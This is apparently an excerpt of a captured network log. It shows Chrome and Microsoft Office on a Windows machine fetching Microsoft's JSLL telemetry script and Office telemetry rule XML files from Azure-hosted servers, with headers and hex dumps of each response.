                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        104192.168.2.74983013.107.246.634436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:12:04 UTC633OUTGET /scripts/c/ms.jsll-4.min.js HTTP/1.1
                                                                                                                                                                        Host: js.monitor.azure.com
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                        Accept: */*
                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                        Referer: https://learn.microsoft.com/
                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                        If-None-Match: 0x8DCEC757C1AD1D1
                                                                                                                                                                        If-Modified-Since: Mon, 14 Oct 2024 17:27:31 GMT
                                                                                                                                                                        2024-11-24 04:12:04 UTC807INHTTP/1.1 304 Not Modified
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:12:04 GMT
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: no-transform, public, max-age=1800, immutable
                                                                                                                                                                        Last-Modified: Mon, 14 Oct 2024 17:27:31 GMT
                                                                                                                                                                        ETag: 0x8DCEC757C1AD1D1
                                                                                                                                                                        x-ms-request-id: 24663fe8-301e-00d3-0bb2-2cfca8000000
                                                                                                                                                                        x-ms-version: 2009-09-19
                                                                                                                                                                        x-ms-meta-jssdkver: 4.3.3
                                                                                                                                                                        x-ms-meta-jssdksrc: [cdn]/scripts/c/ms.jsll-4.3.3.min.js
                                                                                                                                                                        Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,x-ms-meta-jssdkver,x-ms-meta-jssdksrc,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                        x-azure-ref: 20241124T041204Z-178bfbc474bnwsh4hC1NYC2ubs00000005g000000000aenb
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                        X-Cache: TCP_HIT


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        105192.168.2.74983113.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:12:04 UTC192OUTGET /rules/rule700050v1s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:12:05 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:12:04 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1352
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                                                                        ETag: "0x8DC582BE9DEEE28"
                                                                                                                                                                        x-ms-request-id: c57d99b7-c01e-0079-4efd-3de51a000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041204Z-178bfbc474bgvl54hC1NYCsfuw00000005h0000000000yga
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:12:05 UTC1352INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="Medium" /> <F T="2"> <O T


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        106192.168.2.74983213.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:12:04 UTC192OUTGET /rules/rule702951v1s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:12:05 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:12:04 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1405
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                        ETag: "0x8DC582BE12B5C71"
                                                                                                                                                                        x-ms-request-id: b43d4aba-301e-0020-1845-3c6299000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041204Z-178bfbc474bmqmgjhC1NYCy16c00000005gg000000008p3x
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:12:05 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702951" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        107192.168.2.74983313.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:12:04 UTC192OUTGET /rules/rule702950v1s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:12:05 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:12:05 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1368
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                                                                                                        ETag: "0x8DC582BDDC22447"
                                                                                                                                                                        x-ms-request-id: 110996dd-801e-0048-7360-3bf3fb000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041205Z-178bfbc474b9xljthC1NYCtw94000000057g00000000n2ev
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:12:05 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 39 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 72 61 6e 73 6c 61 74 6f 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 72 61 6e 73 6c 61 74 6f 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702950" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Translator" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTranslator" S="Medium" /> <F T=


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        108192.168.2.74983413.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:12:04 UTC192OUTGET /rules/rule701151v1s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:12:05 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:12:05 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1401
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                                        ETag: "0x8DC582BE055B528"
                                                                                                                                                                        x-ms-request-id: 3272c5ec-601e-003d-7d76-3b6f25000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041205Z-174c587ffdf4zw2thC1TEBu340000000041g000000004xhr
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:12:05 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701151" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextA


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                        109192.168.2.74983513.107.246.63443
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:12:04 UTC192OUTGET /rules/rule701150v1s19.xml HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                        2024-11-24 04:12:05 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:12:05 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 1364
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                        ETag: "0x8DC582BE1223606"
                                                                                                                                                                        x-ms-request-id: 45806a8e-701e-003e-807c-3b79b3000000
                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                        x-azure-ref: 20241124T041205Z-174c587ffdfmrvb9hC1TEBtn38000000040g0000000016dn
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:12:05 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 54 65 78 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 54 65 78 74 41 6e 64 46 6f 6e 74 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Text" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenTextAndFonts" S="Medium" /> <F T="2">


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        110192.168.2.74983813.107.246.634436952C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-11-24 04:12:05 UTC370OUTGET /scripts/c/ms.jsll-4.min.js HTTP/1.1
                                                                                                                                                                        Host: js.monitor.azure.com
                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                        Accept: */*
                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                        2024-11-24 04:12:05 UTC889INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sun, 24 Nov 2024 04:12:05 GMT
                                                                                                                                                                        Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                        Content-Length: 207935
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                        Cache-Control: no-transform, public, max-age=1800, immutable
                                                                                                                                                                        Last-Modified: Mon, 14 Oct 2024 17:27:31 GMT
                                                                                                                                                                        ETag: 0x8DCEC757C1AD1D1
                                                                                                                                                                        x-ms-request-id: 24663fe8-301e-00d3-0bb2-2cfca8000000
                                                                                                                                                                        x-ms-version: 2009-09-19
                                                                                                                                                                        x-ms-meta-jssdkver: 4.3.3
                                                                                                                                                                        x-ms-meta-jssdksrc: [cdn]/scripts/c/ms.jsll-4.3.3.min.js
                                                                                                                                                                        Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,x-ms-meta-jssdkver,x-ms-meta-jssdksrc,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                        x-azure-ref: 20241124T041205Z-174c587ffdfks6tlhC1TEBeza400000004100000000060eb
                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                        2024-11-24 04:12:05 UTC15495INData Raw: 2f 2a 21 0a 20 2a 20 31 44 53 20 4a 53 4c 4c 20 53 4b 55 2c 20 34 2e 33 2e 33 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 4d 69 63 72 6f 73 6f 66 74 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 20 2a 20 28 4d 69 63 72 6f 73 6f 66 74 20 49 6e 74 65 72 6e 61 6c 20 4f 6e 6c 79 29 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 75 6e 64 65 66 69 6e 65 64 22 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 21 3d 6e 29 74 28 65 78 70 6f 72 74 73 29 3b 65 6c 73 65 20 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69
                                                                                                                                                                        Data Ascii: /*! * 1DS JSLL SKU, 4.3.3 * Copyright (c) Microsoft and contributors. All rights reserved. * (Microsoft Internal Only) */!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&defi
                                                                                                                                                                        2024-11-24 04:12:06 UTC16384INData Raw: 28 69 29 3a 28 72 3d 66 65 28 22 63 6f 6e 73 6f 6c 65 22 29 29 26 26 28 72 2e 65 72 72 6f 72 7c 7c 72 2e 6c 6f 67 29 28 74 2c 63 65 28 69 29 29 29 29 7d 53 65 28 61 3d 7b 74 68 65 6e 3a 6f 2c 22 63 61 74 63 68 22 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6f 28 75 6e 64 65 66 69 6e 65 64 2c 65 29 7d 2c 22 66 69 6e 61 6c 6c 79 22 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 2c 6e 3d 74 3b 72 65 74 75 72 6e 20 51 28 74 29 26 26 28 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 26 26 74 28 29 2c 65 7d 2c 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 72 6f 77 20 74 26 26 74 28 29 2c 65 7d 29 2c 6f 28 65 2c 6e 29 7d 7d 2c 22 73 74 61 74 65 22 2c 7b 67 65 74 3a 64 7d 29 2c 68 74 28 29 26 26 28 61 5b 6d 74 28
                                                                                                                                                                        Data Ascii: (i):(r=fe("console"))&&(r.error||r.log)(t,ce(i))))}Se(a={then:o,"catch":function(e){return o(undefined,e)},"finally":function(t){var e=t,n=t;return Q(t)&&(e=function(e){return t&&t(),e},n=function(e){throw t&&t(),e}),o(e,n)}},"state",{get:d}),ht()&&(a[mt(
                                                                                                                                                                        2024-11-24 04:12:06 UTC16384INData Raw: 28 65 2c 74 2c 6e 2c 72 29 7b 67 65 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 26 26 65 5b 74 5d 26 26 28 6e 3f 28 6e 2e 63 62 5b 74 65 5d 28 7b 66 6e 3a 72 2c 61 72 67 3a 65 7d 29 2c 6e 2e 68 3d 6e 2e 68 7c 7c 6e 6e 28 70 63 2c 30 2c 6e 29 29 3a 4d 28 72 2c 5b 65 5d 29 29 7d 29 7d 68 63 2e 5f 5f 69 65 44 79 6e 3d 31 3b 76 61 72 20 76 63 3d 68 63 3b 66 75 6e 63 74 69 6f 6e 20 68 63 28 65 29 7b 74 68 69 73 2e 6c 69 73 74 65 6e 65 72 73 3d 5b 5d 3b 76 61 72 20 6e 2c 69 3d 5b 5d 2c 61 3d 7b 68 3a 6e 75 6c 6c 2c 63 62 3a 5b 5d 7d 2c 6f 3d 76 6f 28 65 2c 64 63 29 5b 4b 6e 5d 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6e 3d 21 21 65 2e 63 66 67 2e 70 65 72 66 45 76 74 73 53 65 6e 64 41 6c 6c 7d 29 3b 76 65 28 68 63 2c 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                        Data Ascii: (e,t,n,r){ge(e,function(e){e&&e[t]&&(n?(n.cb[te]({fn:r,arg:e}),n.h=n.h||nn(pc,0,n)):M(r,[e]))})}hc.__ieDyn=1;var vc=hc;function hc(e){this.listeners=[];var n,i=[],a={h:null,cb:[]},o=vo(e,dc)[Kn](function(e){n=!!e.cfg.perfEvtsSendAll});ve(hc,this,function(
                                                                                                                                                                        2024-11-24 04:12:06 UTC16384INData Raw: 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 61 2e 66 6c 75 73 68 43 6f 6d 70 6c 65 74 65 3d 65 2c 50 3d 21 30 2c 52 2e 72 75 6e 28 6f 2c 61 29 2c 66 5b 67 72 5d 28 29 2c 6f 5b 6c 72 5d 28 61 29 7d 2c 36 2c 6e 29 2c 69 7d 2c 66 5b 6f 72 5d 3d 73 2c 66 2e 61 64 64 50 6c 75 67 69 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 29 7b 69 66 28 21 65 29 72 65 74 75 72 6e 20 72 26 26 72 28 21 31 29 2c 76 6f 69 64 20 43 28 6f 75 29 3b 76 61 72 20 69 3d 73 28 65 5b 24 6e 5d 29 3b 69 66 28 69 26 26 21 74 29 72 65 74 75 72 6e 20 72 26 26 72 28 21 31 29 2c 76 6f 69 64 20 43 28 22 50 6c 75 67 69 6e 20 5b 22 2b 65 5b 24 6e 5d 2b 22 5d 20 69 73 20 61 6c 72 65 61 64 79 20 6c 6f 61 64 65 64 21 22 29 3b 76 61 72 20 61 2c 6f 3d 7b 72 65 61 73 6f 6e 3a 31 36 7d 3b 66
                                                                                                                                                                        Data Ascii: (e,function(e){a.flushComplete=e,P=!0,R.run(o,a),f[gr](),o[lr](a)},6,n),i},f[or]=s,f.addPlugin=function(e,t,n,r){if(!e)return r&&r(!1),void C(ou);var i=s(e[$n]);if(i&&!t)return r&&r(!1),void C("Plugin ["+e[$n]+"] is already loaded!");var a,o={reason:16};f
                                                                                                                                                                        2024-11-24 04:12:06 UTC16384INData Raw: 6c 3a 31 2c 43 72 69 74 69 63 61 6c 3a 32 7d 29 2c 75 6e 64 65 66 69 6e 65 64 2c 75 6e 64 65 66 69 6e 65 64 29 2c 53 6c 3d 22 22 3b 66 75 6e 63 74 69 6f 6e 20 78 6c 28 65 29 7b 74 72 79 7b 69 66 28 6f 65 28 6f 74 28 29 29 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 76 61 72 20 74 3d 28 6e 65 77 20 44 61 74 65 29 5b 4f 73 5d 28 29 2c 6e 3d 66 65 28 65 3d 3d 3d 45 6c 2e 4c 6f 63 61 6c 53 74 6f 72 61 67 65 3f 22 6c 6f 63 61 6c 53 74 6f 72 61 67 65 22 3a 22 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 22 29 2c 72 3d 53 6c 2b 74 2c 69 3d 28 6e 2e 73 65 74 49 74 65 6d 28 72 2c 74 29 2c 6e 2e 67 65 74 49 74 65 6d 28 72 29 21 3d 3d 74 29 3b 69 66 28 6e 5b 52 73 5d 28 72 29 2c 21 69 29 72 65 74 75 72 6e 20 6e 7d 63 61 74 63 68 28 61 29 7b 7d 72 65 74 75 72 6e 20 6e 75 6c
                                                                                                                                                                        Data Ascii: l:1,Critical:2}),undefined,undefined),Sl="";function xl(e){try{if(oe(ot()))return null;var t=(new Date)[Os](),n=fe(e===El.LocalStorage?"localStorage":"sessionStorage"),r=Sl+t,i=(n.setItem(r,t),n.getItem(r)!==t);if(n[Rs](r),!i)return n}catch(a){}return nul
                                                                                                                                                                        2024-11-24 04:12:06 UTC16384INData Raw: 6f 20 74 72 61 63 6b 20 70 61 67 65 20 76 69 73 69 74 20 74 69 6d 65 20 66 61 69 6c 65 64 2c 20 6d 65 74 72 69 63 20 77 69 6c 6c 20 6e 6f 74 20 62 65 20 63 6f 6c 6c 65 63 74 65 64 3a 20 22 2b 63 65 28 72 29 29 7d 7d 2c 59 28 65 2c 22 5f 6c 6f 67 67 65 72 22 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 7d 29 2c 59 28 65 2c 22 70 61 67 65 56 69 73 69 74 54 69 6d 65 54 72 61 63 6b 69 6e 67 48 61 6e 64 6c 65 72 22 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 7d 7d 29 7d 29 7d 76 61 72 20 4e 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 74 68 69 73 5b 67 64 5d 3d 50 74 28 29 2c 74 68 69 73 2e 70 61 67 65 4e 61 6d 65 3d 65 2c 74 68 69 73 2e 70 61 67 65 55 72 6c 3d 74 7d 2c 44 64 3d 66 75 6e 63 74 69 6f 6e 28
